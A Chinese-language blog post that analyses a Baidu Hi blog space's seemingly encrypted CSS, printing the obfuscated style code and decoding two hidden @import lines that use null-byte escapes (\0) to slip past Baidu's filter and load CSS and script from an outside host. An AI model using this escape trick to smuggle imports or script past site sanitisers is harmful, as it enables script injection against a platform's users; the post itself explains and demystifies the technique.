從我發(fā)布百度CSS import漏洞開始，就有人不斷問我關(guān)于http://hi.baidu.com/edikid這個(gè)空間，到現(xiàn)在可能有上百人了吧！我曾經(jīng)說過CSS內(nèi)容原則上是不能被加密的——原因就是它需要被瀏覽器解析。但是當(dāng)大家用我的http://dohi.cn/hisearchcss.asp對(duì)他的空間CSS進(jìn)行查看時(shí)，看到的是亂碼，似乎他創(chuàng)造了一個(gè)奇跡。
這里Monyer不對(duì)其本人以及技術(shù)做任何討論或評(píng)價(jià)，僅僅就他的CSS做一下基本解析，以后大家遇到此問題就不用苦惱了。
先列一下其空間的CSS代碼
以下是代碼片段：
@ODY{
@ODY%7@@ACKGROUND:#FFCC00%3@WIDTH:100%%3@OVERFLOW-X:HIDDEN%3@COLOR:#2FA4DE} #HEADER%7@@ACKGROUND:#CCFF66%3@HEIGHT:100PX%3@WIDTH:100%} AD1,AD2,AD3,AD4,AD5,AD6%7@@ACKGROUND:#FFCC00%3@COLOR:#2FA4D}@\0i\0m\0p\0o\0r\000t "\0h\0t\0t\0p://bl\0o\0g\0.ed\0i\0k\0id.ne\0t\0/\0h\0ibaidu/c\0s\0s.\0h\0t\0m\0l\0";E%3@} #LAYOUT%7@WIDTH:98%%3@} #LAYOUT TD.C3T1%-ARROW-COLOR: #000000%3@ SCROLL@AR-TRACK-COLOR: #FFFFFF%3@ SCROLL@AR-DARKSHADOW@ODY%7@@ACKGROUND:#FFCC00%3@WIDTH:100%%3@OVERFLOW-X:HIDDEN%3@COLOR:#2FA4DE} %%3@ SCROLL@AR-DARKSHADOW-COLOR: #FFFFFF%3@ SCROLL@AR-@ASE-COLOR: #FFFFFF%3@;}@\0i\0m\0p\0o\0r\00t "h\0t\0t\000p:/\0/\0b\0l\0o\0g.e\0d\0i\0k\0i\0d.n\0e\0t\0/\0h\0i\0b\0a\0idu\0/\000js.h\0t\0m\0l";E%3@} #LAYOUT%7@WIDTH:98%%3@} #LAYOUT TD.C3T1%-ARROW-COLOR: #000000%3@ SCROLL@AR-TRACK-COLOR: #FFFFFF%3@ SCROLL@AR-DARKSHADOW@ODY%7@@ACKGROUND:#FFCC00%3@WIDTH:100%%3@OVERFLOW-X:HIDDEN%3@COLOR:#2FA4DE} %%3@ %
說實(shí)話，如果偏讓我對(duì)這些代碼說出個(gè)所以然來，那是不現(xiàn)實(shí)的，因?yàn)榧词箤?duì)于你們所有的瀏覽器來說，其中的大部分代碼都是無效代碼，也就是不管你寫什么，都不會(huì)執(zhí)行。
所以里面的
以下是代碼片段：
@ODY{
@ODY%7@@ACKGROUND:#FFCC00%3@WIDTH:100%%3@OVERFLOW-X:HIDDEN%3@COLOR:#2FA4DE} #HEADER%7@@ACKGROUND:#CCFF66%3@HEIGHT:100PX%3@WIDTH:100%} AD1,AD2,AD3,AD4,AD5,AD6%7@@ACKGROUND:#FFCC00%3@COLOR:#2FA4D}
E%3@} #LAYOUT%7@WIDTH:98%%3@} #LAYOUT TD.C3T1%-ARROW-COLOR: #000000%3@ SCROLL@AR-TRACK-COLOR: #FFFFFF%3@ SCROLL@AR-DARKSHADOW@ODY%7@@ACKGROUND:#FFCC00%3@WIDTH:100%%3@OVERFLOW-X:HIDDEN%3@COLOR:#2FA4DE} %%3@ SCROLL@AR-DARKSHADOW-COLOR: #FFFFFF%3@ SCROLL@AR-@ASE-COLOR: #FFFFFF%3@;}
E%3@} #LAYOUT%7@WIDTH:98%%3@} #LAYOUT TD.C3T1%-ARROW-COLOR: #000000%3@ SCROLL@AR-TRACK-COLOR: #FFFFFF%3@ SCROLL@AR-DARKSHADOW@ODY%7@@ACKGROUND:#FFCC00%3@WIDTH:100%%3@OVERFLOW-X:HIDDEN%3@COLOR:#2FA4DE} %%3@ %
沒有任何意義，你愿意寫什么寫什么，只要保證語句的正常結(jié)束就可以！這也是你不管怎么樣也不會(huì)讀懂的原因。細(xì)心的朋友會(huì)發(fā)現(xiàn)我提出了其中的兩句代碼，它們是：
@\0i\0m\0p\0o\0r\000t "\0h\0t\0t\0p://bl\0o\0g\0.ed\0i\0k\0id.ne\0t\0/\0h\0ibaidu/c\0s\0s.\0h\0t\0m\0l\0";
@\0i\0m\0p\0o\0r\00t "h\0t\0t\000p:/\0/\0b\0l\0o\0g.e\0d\0i\0k\0i\0d.n\0e\0t\0/\0h\0i\0b\0a\0idu\0/\000js.h\0t\0m\0l";
在CSS里“\0”、“\00”、“\000”是會(huì)被瀏覽器忽略的（其他的相關(guān)的CSS hacking 請(qǐng)參考Monyer的XSS系列），那我們?nèi)サ艨纯矗?br /> @import "http://blog.edikid.net/hibaidu/css.html";
@import http://blog.edikid.net/hibaidu/js.html;
對(duì)于這兩句，我想大家再熟悉不過了吧？其中不僅可以放被調(diào)用的CSS代碼，同時(shí)也可以隨意插入js代碼（我們不是用它插過視頻么？）
但是我們把作者的所有CSS全部copy到我們那里是不會(huì)成功的，原因就是import字符及相關(guān)繞過方式早已經(jīng)被百度過濾了，而作者是在百度過濾之前加入的，并且沒有修改過，所以仍然有效。
對(duì)于
http://blog.edikid.net/hibaidu/css.html
http://blog.edikid.net/hibaidu/js.html
第一個(gè)CSS調(diào)用我沒有分析，因?yàn)槲覝y(cè)試時(shí)恰好文件無法訪問（第二個(gè)應(yīng)該不會(huì)被執(zhí)行，因?yàn)榍懊娴幕煜Z句不是很完整，這個(gè)要看你客戶端是什么瀏覽器了）。
但是以前一次分析時(shí)好像記得其中有類似
這樣的html轉(zhuǎn)向代碼。由于后綴名的關(guān)系，當(dāng)你用瀏覽器直接訪問時(shí)，里面的CSS不會(huì)被執(zhí)行，但會(huì)執(zhí)行嵌入其中的html或js代碼；當(dāng)你用import調(diào)用時(shí)，里面的html及腳本不會(huì)執(zhí)行，但里面的CSS會(huì)執(zhí)行。所以你只能用記事本來打開，或flashget下載。
其實(shí)說了這么多，我們無非是在CSS上打轉(zhuǎn)，如果真正地了解什么是CSS，并切身實(shí)地地去思考，我相信就不會(huì)有那么多問題出現(xiàn)了。

最新評(píng)論